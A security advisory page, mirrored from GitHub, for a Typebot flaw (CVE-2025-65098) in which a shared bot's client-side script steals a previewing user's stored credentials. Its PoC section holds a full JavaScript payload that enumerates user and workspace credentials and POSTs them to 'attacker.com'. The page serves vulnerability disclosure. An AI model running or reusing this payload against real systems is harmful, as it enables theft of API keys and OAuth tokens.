Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-4xc5-wfwc-jw47

Опубликовано: 22 янв. 2026
Источник: github
Github: Прошло ревью
CVSS3: 7.4

Описание

Typebot affected by Credential Theft via Client-Side Script Execution and API Authorization Bypass

Summary

Client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The /api/trpc/credentials.getCredentials endpoint returns plaintext API keys without verifying credential ownership

Details

The Script block with "Execute on client" enabled runs arbitrary JavaScript in the victim's browser with their authenticated session. This allows API calls on their behalf.

The /api/trpc/credentials.getCredentials endpoint returns plaintext credentials:

GET /api/trpc/credentials.getCredentials?input={"json":{"scope":"user","credentialsId":"cm6sofgv200085ms9d2qyvgwc"}} Response: { "result": { "data": { "json": { "name": "My OpenAI Key", "data": { "apiKey": "sk-proj-abc123...xyz789" } } } } }

The endpoint only checks if you're authenticated, not if you own the credential. Anyone can steal credentials by calling this with different IDs.

Vulnerable file: packages/embeds/js/src/features/blocks/logic/script/executeScript.ts

PoC

Here's how to reproduce:

  1. Create a new typebot in the Builder
  2. Add a Script block and enable "Execute on client"
  3. Paste this code:
const exfil = async () => { const data = { credentials: [] }; const list = await fetch( "https://app.typebot.io/api/trpc/credentials.listCredentials?input=" + encodeURIComponent(JSON.stringify({ json: { scope: "user" } })), { credentials: "include" } ); const creds = (await list.json()).result?.data?.json?.credentials || []; for (const c of creds) { const full = await fetch( "https://app.typebot.io/api/trpc/credentials.getCredentials?input=" + encodeURIComponent( JSON.stringify({ json: { scope: "user", credentialsId: c.id } }) ), { credentials: "include" } ); const d = await full.json(); data.credentials.push({ name: d.result.data.json.name, type: c.type, apiKey: d.result.data.json.data.apiKey, fullData: d.result.data.json.data, }); } const ws = await fetch( "https://app.typebot.io/api/trpc/workspace.listWorkspaces", { credentials: "include" } ); const workspaces = (await ws.json()).result.data.json.workspaces; for (const w of workspaces) { const wsList = await fetch( "https://app.typebot.io/api/trpc/credentials.listCredentials?input=" + encodeURIComponent( JSON.stringify({ json: { workspaceId: w.id, scope: "workspace" } }) ), { credentials: "include" } ); const wsCreds = (await wsList.json()).result?.data?.json?.credentials || []; for (const c of wsCreds) { const full = await fetch( "https://app.typebot.io/api/trpc/credentials.getCredentials?input=" + encodeURIComponent( JSON.stringify({ json: { workspaceId: w.id, scope: "workspace", credentialsId: c.id, }, }) ), { credentials: "include" } ); const d = await full.json(); data.credentials.push({ workspace: w.name, name: d.result.data.json.name, type: c.type, fullData: d.result.data.json.data, }); } } await fetch("https://attacker.com/exfil", { method: "POST", body: JSON.stringify(data), }); }; await exfil();
  1. Share typebot with victim
  2. When victim clicks "Run" to preview, script executes
  3. All credentials exfiltrated in plaintext:
{ "credentials": [ { "name": "My OpenAI", "type": "openai", "apiKey": "sk-proj-abc123...", "fullData": { "apiKey": "sk-proj-abc123..." } }, { "workspace": "Company Workspace", "name": "Google Sheets", "type": "google-sheets", "fullData": { "refresh_token": "1//0gHdP...", "access_token": "ya29.a0..." } } ] }

Impact

All Typebot users storing credentials are affected. Attackers can steal OpenAI API keys, Google Sheets tokens, SMTP passwords, and all other stored credentials.

Example: Attacker creates a "Customer Feedback Template" and shares with 5 company employees. When they preview it, the attacker obtains the company's OpenAI key ($500+/month), Google Sheets access with customer data, and SMTP credentials.

Root causes:

  • Client-side scripts execute with victim's authenticated session
  • API returns plaintext credentials without ownership verification
  • No user warnings or consent prompts
  • Exploitable with free tier account

CWE-639 (Authorization Bypass), CWE-79 (XSS), CWE-311 (Missing Encryption)

Ссылки

Пакеты

Наименование

@typebot.io/js

npm
Затронутые версииВерсия исправления

< 0.9.15

0.9.15

EPSS

Процентиль: 5%
0.00021
Низкий

7.4 High

CVSS3

CVE ID

CVE-2025-65098

Дефекты

CWE-79

Связанные уязвимости

nvd логотип

CVE-2025-65098

CVSS3: 7.4
nvd
16 дней назад

Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue.

EPSS

Процентиль: 5%
0.00021
Низкий

7.4 High

CVSS3

CVE ID

CVE-2025-65098

Дефекты

CWE-79